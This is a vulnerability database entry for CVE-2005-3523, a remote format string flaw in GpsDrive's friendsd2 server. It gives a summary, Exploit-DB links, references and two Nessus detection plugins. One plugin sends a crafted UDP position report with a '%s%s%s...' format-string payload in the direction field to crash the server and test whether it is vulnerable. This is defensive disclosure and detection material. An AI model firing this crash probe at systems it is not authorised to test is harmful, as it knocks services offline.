CVE-2005-3523 - Unspecified vulnerability in Gpsdrive
- Attack vector: UNKNOWN
- Attack complexity: UNKNOWN
- Privileges required: UNKNOWN
- Confidentiality impact: UNKNOWN
- Integrity impact: UNKNOWN
- Availability impact: UNKNOWN

Summary
Format string vulnerability in friendsd2 in GpsDrive allows remote attackers to execute arbitrary code via the dir (direction) field.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 1 |
Exploit-Db
id | title | description | reporter | published | modified | last seen | source |
---|---|---|---|---|---|---|---|
EDB-ID:1291 | gpsdrive <= 2.09 friendsd2 Remote Format String Exploit x86 | gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86). CVE-2005-3523. Remote exploit for linux platform | Kevin Finisterre | 2005-11-04 | 2005-11-04 | 2016-01-31 | https://www.exploit-db.com/download/1291/ |
EDB-ID:1290 | gpsdrive <= 2.09 friendsd2 Remote Format String Exploit ppc | gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc). CVE-2005-3523. Remote exploit for linux platform | Kevin Finisterre | 2005-11-04 | 2005-11-04 | 2016-01-31 | https://www.exploit-db.com/download/1290/ |
Nessus
- NASL family: Debian Local Security Checks
- NASL id: DEBIAN_DSA-891.NASL
- title: Debian DSA-891-1 : gpsdrive - format string
- description: Kevin Finisterre discovered a format string vulnerability in gpsdrive, a car navigation system, that can lead to the execution of arbitrary code.
- plugin id: 22757
- published: 2006-10-14
- modified: 2020-06-02
- last seen: 2020-06-01
- reporter: This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
- source: https://www.tenable.com/plugins/nessus/22757
- code:

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-891. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(22757);
  script_version("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:19");

  script_cve_id("CVE-2005-3523");
  script_xref(name:"DSA", value:"891");

  script_name(english:"Debian DSA-891-1 : gpsdrive - format string");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Kevin Finisterre discovered a format string vulnerability in gpsdrive,
a car navigation system, that can lead to the execution of arbitrary
code."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2005/dsa-891"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade the gpsdrive package.

The old stable distribution (woody) does not contain gpsdrive packages.

For the stable distribution (sarge) this problem has been fixed in
version 2.09-2sarge1."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:gpsdrive");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");

  script_set_attribute(attribute:"patch_publication_date", value:"2005/11/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/14");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/04");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}

include("audit.inc");
include("debian_package.inc");

# Local check: requires SSH-collected dpkg output for the Debian host.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Flag the host if the installed gpsdrive on sarge (3.1) is older than the fixed version.
flag = 0;
if (deb_check(release:"3.1", prefix:"gpsdrive", reference:"2.09-2sarge1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
- NASL family: Gain a shell remotely
- NASL id: GPSFRIENDS_FRIENDSD_FORMAT_STRING.NASL
- title: GpsDrive friendsd2 dir Field Remote Format String
- description: The remote host is running a GpsDrive friendsd server, which records the positions of friends on a map. The version of friendsd installed on the remote host is affected by a format string vulnerability. An attacker can leverage this issue using a specially crafted packet to crash the server and possibly execute code on the remote host subject to the privileges under which the server runs.
- plugin id: 20159
- published: 2005-11-07
- modified: 2020-06-02
- last seen: 2020-06-01
- reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
- source: https://www.tenable.com/plugins/nessus/20159
- code:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20159);
  script_version("1.20");
  script_cvs_date("Date: 2018/07/12 19:01:15");

  script_cve_id("CVE-2005-3523");
  script_bugtraq_id(15319);

  script_name(english:"GpsDrive friendsd2 dir Field Remote Format String");
  script_summary(english:"Checks for format string vulnerability in GpsDrive friendsd");

  script_set_attribute(attribute:"synopsis", value:"The remote server is affected by a format string vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a GpsDrive friendsd server, which records
the positions of friends on a map.

The version of friendsd installed on the remote host is affected by a
format string vulnerability. An attacker can leverage this issue using
a specially crafted packet to crash the server and possibly execute
code on the remote host subject to the privileges under which the
server runs.");
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dabc8c33");
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?777cc0de");
  script_set_attribute(attribute:"solution", value:"Upgrade to 2.10pre3-cvs or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/11/07");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

# friendsd listens on UDP 50123.
port = 50123;
if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, "UDP");

# done == NULL: no friendsd response seen yet; 0: saw $START:$; 1: saw $END:$.
done = NULL;

# A position report.
args = make_list(
  "POS:",                       # constant => report position
  rand_str(                     # a random ID string
    length:22,
    charset:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
  ),
  SCRIPT_NAME,                  # a name
  "39.187362",                  # latitude
  "-76.818423",                 # longitude
  unixtime(),                   # last report (current time)
  "10",                         # speed
  "90",                         # direction
  raw_string(0x00)              # marks end of packet
);
pos = "";
foreach arg (args)
{
  pos += arg + " ";
}
pos = chomp(pos);

# Make sure the server is up.
tries = 5;
for (iter = 0; iter < tries; iter++)
{
  soc = open_sock_udp(port);
  if (!soc) audit(AUDIT_SOCK_FAIL, port, "UDP");

  # Send our position report.
  send(socket:soc, data:pos);

  # Read the response.
  repeat
  {
    res = recv(socket:soc, length:1024);
    if (isnull(res)) break;

    # If it's the first line...
    if (isnull(done))
    {
      # If the first line looks like friendsd, set done=0.
      if (string("$START:$\n") == res) done = 0;
      # Otherwise, it's not friendsd so we're done.
      else
      {
        close(soc);
        exit(0);
      }
    }
    # If it looks like the last line, set done=1.
    else if (string("$END:$\n") == res) done = 1;
  } until (done);
  close(soc);

  if (done) break;
}
# We're done if we couldn't get a response after several iterations.
if (isnull(done)) exit(0);

# Try to crash the server with a bogus position report.
exploit = str_replace(
  string:pos,
  find:" 90 ",
  replace:"%s%s%s%s%s%s%s%s%s"
);
for (iter = 0; iter < tries; iter++)
{
  soc = open_sock_udp(port);
  if (!soc) audit(AUDIT_SOCK_FAIL, port, "UDP");
  # Send a position report with a format string.
  send(socket:soc, data:exploit);
  close(soc);
}
sleep(1);

# Reset the response marker so the second probe starts from "no response seen";
# without this, 'done' is still 1 from the first probe and the final check can never fire.
done = NULL;

# Report a position again to see whether the server is up.
for (iter = 0; iter < tries; iter++)
{
  soc = open_sock_udp(port);
  if (!soc) audit(AUDIT_SOCK_FAIL, port, "UDP");

  # Send our position report.
  send(socket:soc, data:pos);

  # Read the response.
  repeat
  {
    res = recv(socket:soc, length:1024);
    if (isnull(res)) break;

    # If it's the first line...
    if (isnull(done))
    {
      # If the first line looks like friendsd, set done=0.
      if (string("$START:$\n") == res) done = 0;
      # Otherwise, it's not friendsd so we're done.
      else
      {
        close(soc);
        exit(0);
      }
    }
    # If it looks like the last line, set done=1.
    else if (string("$END:$\n") == res) done = 1;
  } until (done);
  close(soc);

  if (done) break;
}
# There's a problem if we couldn't get a response after several iterations.
if (isnull(done)) security_hole(port:port, proto:"udp");
```
References
- http://seclists.org/lists/fulldisclosure/2005/Nov/0130.html
- http://www.debian.org/security/2005/dsa-891
- http://www.securityfocus.com/bid/15319
- http://www.osvdb.org/20531
- http://secunia.com/advisories/17473
- http://secunia.com/advisories/17477
- http://www.novell.com/linux/security/advisories/2005_27_sr.html
- http://www.vupen.com/english/advisories/2005/2307
- http://www.securityfocus.com/archive/1/415788/30/0/threaded
- http://www.digitalmunition.com/DMA%5B2005-1104a%5D.txt